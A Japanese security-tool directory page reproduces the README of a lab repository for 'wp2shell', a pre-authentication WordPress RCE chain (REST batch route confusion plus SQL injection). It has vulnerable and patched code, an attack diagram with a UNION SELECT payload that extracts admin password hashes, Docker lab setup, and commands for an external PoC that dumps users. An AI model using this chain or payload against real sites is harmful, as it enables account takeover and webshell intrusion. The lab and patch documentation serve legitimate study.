Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-63030-lab — wp2shell (CVE-2026-63030 & CVE-2026-60137) - 完全なRCEチェーン | Kitploit
ツール/GitHubGitHub/mhassani97/cve-2026-63030-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ学習と教育ラボと実践
GitHubmhassani97/cve-2026-63030-lab

cve-2026-63030-lab

wp2shell (CVE-2026-63030 & CVE-2026-60137) - 完全なRCEチェーン

リポジトリを見る
14日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-63030 — wp2shell Lab

WordPress コアにおける事前認証 RCE:REST API バッチルート混乱 + SQL インジェクション

WordPress CVE CVSS License

概要

ツールをダウンロード

wp2shell は、WordPress コアに存在する、それぞれ独立しては低深刻度の 2 つのバグを組み合わせることで、認証されていないリモート攻撃者に以下を可能にする攻撃チェーンです:

  1. 認証情報なしで SQL インジェクションのシンクに到達する
  2. データベースから管理者パスワードのハッシュを抽出する
  3. 新しい管理者アカウントを作成する
  4. ウェブシェルをアップロードし、完全なリモートコード実行(RCE)を達成する
プロパティ詳細
CVECVE-2026-63030 + CVE-2026-60137
CVSS9.8 Critical
認証要件なし(事前認証)
攻撃ベクターネットワーク
影響を受けるバージョンWordPress 6.9.0–6.9.4 および 7.0.0–7.0.1
修正済みバージョン6.9.5 および 7.0.2(2026年7月17日リリース)

2 つのバグ

CVE-2026-63030 — REST API バッチルート混乱

ファイル: wp-includes/rest-api/class-wp-rest-server.php

serve_batch_request_v1() は、ハンドラ用の $matches[] と結果用の $validation[] という 2 つの並列配列を保持します。サブリクエストが WP_Error(壊れたパス)で失敗すると、そのエラーは $validation[] にはプッシュされますが、$matches[] にはプッシュされません。これにより +1 のインデックスずれが発生し、サブリクエスト i はサブリクエスト i+1 のハンドラでディスパッチされます。

root@kitploit:~
// VULNERABLE (7.0.1)
if ( is_wp_error( $route ) ) {
    $responses[] = envelope();
    continue; // $matches[] NOT pushed ← BUG
}

// PATCHED (7.0.2)
if ( is_wp_error( $route ) ) {
    $matches[]   = null; // ← FIX: keeps arrays in sync
    $responses[] = envelope();
    continue;
}

CVE-2026-60137 — WP_Query における SQL インジェクション

ファイル: wp-includes/class-wp-query.php

author__not_in パラメータは整数の配列を期待します。文字列が渡されると、implode() が生の値をそのまま SQL の WHERE 句に連結します。エスケープもパラメータ化も行われません。

root@kitploit:~
// VULNERABLE (7.0.1)
$where .= ' NOT IN (' . implode(',', $q['author__not_in']) . ')';

// PATCHED (7.0.2)
$safe   = implode(',', array_map('absint', (array) $q['author__not_in']));
$where .= " NOT IN ($safe)";

攻撃チェーン

root@kitploit:~
Unauthenticated Attacker
        │
        ▼
POST /?rest_route=/batch/v1          ← Outer batch
  sub-req 0: "///"   → WP_Error → index shift (+1)
  sub-req 1: POST /wp/v2/posts       ← dispatched under BATCH handler
  sub-req 2: POST /batch/v1          ← dummy
        │
        │  [Confusion #1 active]
        ▼
Inner batch (body of sub-req 1)      ← schema never validated
  inner 0: "///"    → index shift (+1)
  inner 1: GET /wp/v2/posts?author_exclude=<PAYLOAD>
           dispatched under posts get_items()
        │
        │  [Confusion #2 active]
        ▼
WP_Query: author__not_in = raw string
        │
        ▼
SQL: NOT IN (0) UNION SELECT 999999,...,HEX(user_pass),...
        │
        ▼
title.rendered = "||1|admin|$wp$2y$10$...<hash>...||"
        │
        ▼
Crack hash  OR  crack-free oEmbed technique
        │
        ▼
POST /wp/v2/users → new admin → plugin upload → webshell → RCE

ラボのセットアップ

前提条件

ツールダウンロード
Docker Desktop(Windows / macOS)https://www.docker.com/products/docker-desktop
Docker Engine(Linux)https://docs.docker.com/engine/install
Githttps://git-scm.com/downloads
Burp Suite Community(オプション)https://portswigger.net/burp/communitydownload

ステップ 1 — リポジトリをクローンする

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/cve-2026-63030-lab
cd cve-2026-63030-lab

次のファイルが表示されます:

root@kitploit:~
cve-2026-63030-lab/
├── docker-compose.yml     ← defines WordPress + MySQL containers
├── Dockerfile             ← custom image with Apache fix + wp-cli
├── init.sh                ← configures permalink after install
└── fix-htaccess.ps1       ← Windows helper (run if Apache returns 404)

ステップ 2 — ラボをビルドして起動する

root@kitploit:~
docker compose up -d --build

これにより以下が行われます:

  • カスタム WordPress 7.0.1 イメージをビルドします(初回は約 1~2 分かかります)
  • MySQL 8.0 データベースコンテナを起動します
  • WordPress を http://localhost:9090 で公開します

両方のコンテナが実行中であることを確認します:

root@kitploit:~
docker compose ps

期待される出力:

root@kitploit:~
NAME              STATUS
wp2shell-lab      running
wp2shell-db       running

ステップ 3 — WordPress のインストールを完了する

ブラウザで http://localhost:9090 を開き、次の項目を入力します:

フィールド推奨値
Site TitleCVE-2026-63030
Usernameadmin
Password任意のパスワード
Email[email protected]

Install WordPress をクリックし、ログインします。


ステップ 4 — REST API ルーティングを有効にする(必須)

インストール後に一度だけ実行します:

Linux / macOS:

root@kitploit:~
docker exec wp2shell-lab bash -c "
  wp rewrite structure '/%postname%/' --allow-root --path=/var/www/html &&
  wp rewrite flush --allow-root --path=/var/www/html
"

Windows PowerShell:

root@kitploit:~
docker exec wp2shell-lab bash -c "wp rewrite structure '/%postname%/' --allow-root --path=/var/www/html && wp rewrite flush --allow-root --path=/var/www/html"

期待される出力:

root@kitploit:~
Success: Rewrite structure set.
Success: Rewrite rules flushed.

ステップ 5 — .htaccess を修正する(Windows のみ。REST API で 404 が発生する場合)

root@kitploit:~
.\fix-htaccess.ps1

ステップ 6 — ラボの準備ができていることを確認する

root@kitploit:~
curl -s http://localhost:9090/wp-json/ | python3 -m json.tool | head -5

"namespaces" を含む JSON レスポンスが表示されれば、ラボの準備は完了です。


後片付け

root@kitploit:~
# Stop and remove everything including database
docker compose down -v

エクスプロイト(PoC)

⚠️ 許可されたセキュリティ研究および教育目的に限ります。 自分が所有するシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用してください。

完全なエクスプロイトチェーン(検出 → SQLi → 管理者作成 → ウェブシェル → RCE)は次に実装されています:

github.com/Icex0/wp2shell-poc

root@kitploit:~
git clone https://github.com/Icex0/wp2shell-poc
cd wp2shell-poc
pip install -r requirements.txt

# Step 1: Detection only (non-destructive)
python wp2shell.py check http://localhost:9090

# Step 2: Read database — extract users and hashes
python wp2shell.py read --preset users http://localhost:9090

パッチ

3 つのファイル、PHP 10 行未満:

ファイル変更内容
class-wp-rest-server.php配列の同期を保つためのプレースホルダ $matches[] = null
class-wp-query.php(array) キャスト + array_map('absint', ...)
class-wp-rest-posts-controller.phpREST レイヤーでも同じサニタイズ処理

修正のためには WordPress 6.9.5 または 7.0.2 に更新してください。


参考文献

リソースリンク
GitHub Advisory(CVE-2026-63030)GHSA-ff9f-jf42-662q
GitHub Advisory(CVE-2026-60137)GHSA-fpp7-x2x2-2mjf
公開 PoChttps://github.com/Icex0/wp2shell-poc

❤️ を込めて Black Security Team が作成

Website Telegram LinkedIn

このリポジトリは 教育目的および許可されたセキュリティ研究専用 です。 自分が所有していないシステム、または明示的な書面によるテスト許可を得ていないシステムに対してテストを行わないでください。